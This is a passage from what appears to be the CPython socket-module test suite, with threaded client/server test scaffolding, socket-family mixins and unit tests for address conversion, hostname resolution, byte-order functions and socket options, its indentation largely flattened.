self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
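# Illustrative sketch (editor's addition, not part of the original file): how
# the mixins above compose into a connected-stream test, as the comment before
# SocketTestBase describes. The echo test bodies are hypothetical.
class _ExampleTCPEchoTest(ConnectedStreamTestMixin, TCPTestBase):
    def testEcho(self):                      # server half
        self.assertEqual(self.cli_conn.recv(1024), MSG)
    def _testEcho(self):                     # client half
        self.serv_conn.sendall(MSG)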
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
if sys.platform == 'OpenVMS':
s.bind(('127.0.0.1', 0))
else:
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
        self.assertIn('not NoneType', str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
        if fqhn not in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(socket, 'if_nametoindex'),
'socket.if_nametoindex() not available.')
def testInvalidInterfaceNameToIndex(self):
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no appropriate service (TBD?)')
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
            # assumption-breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
        # it is reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
        # A new socket should start with SO_REUSEADDR disabled (reuse == 0)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
        self.assertEqual(reuse, 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
        self.assertNotEqual(reuse, 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
